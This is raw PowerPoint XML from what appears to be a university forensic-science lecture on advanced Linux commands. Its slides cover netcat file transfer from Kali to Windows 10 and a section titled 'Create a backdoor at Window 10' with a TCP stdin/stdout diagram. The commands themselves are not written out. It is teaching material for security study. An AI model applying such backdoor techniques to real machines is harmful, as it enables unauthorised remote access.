        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p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lvl="0">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>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
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="Picture 161" descr="Image result for University of Baltimore"/>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7640320" y="4705350"/>
            <a:ext cx="1503680" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76180" y="4992580"/>
            <a:ext cx="699230" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
                <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SlidesCarnival</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
              <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Rectangle 162"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932544" y="4854226"/>
            <a:ext cx="3993401" cy="430887"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M.S. in Forensic Science - High Technology Crime: wxu@ubalt.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
              <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
            </a:endParaRPr>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60" r:id="rId3"/>
    <p:sldLayoutId id="2147483662" r:id="rId4"/>
    <p:sldLayoutId id="2147483663"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tif"/><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tif"/><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Standard_streams" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/unix/nc.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brianstorti.com/understanding-shell-script-idiom-redirec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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305100" y="1161050"/>
            <a:ext cx="6153000" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Linux Commands</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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1364171"/>
            <a:ext cx="6715156" cy="2780232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311612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Your work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933795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Goal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send files from Kali to Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is integrated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211001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fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568256" y="790277"/>
            <a:ext cx="7694236" cy="3572625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427580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fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5211454" y="2515153"/>
            <a:ext cx="776253" cy="84861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4770012" y="3550164"/>
            <a:ext cx="3801005" cy="819264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="4799439" cy="3105013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156228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Create a backdoor at Window 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035595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Backdoor background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518479" y="2498702"/>
            <a:ext cx="6933259" cy="1280665"/>
            <a:chOff x="1220568" y="5449115"/>
            <a:chExt cx="16789969" cy="3719928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531580" y="5705018"/>
              <a:ext cx="2210115" cy="111253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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663240"/>
              <a:ext cx="2233407" cy="1023138"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="380241"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="5449115"/>
              <a:ext cx="569604" cy="526580"/>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1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2533" dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="2533" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012255" y="8642463"/>
              <a:ext cx="569604" cy="526580"/>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1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2533"/>
                <a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351926" y="6095010"/>
              <a:ext cx="3841633" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
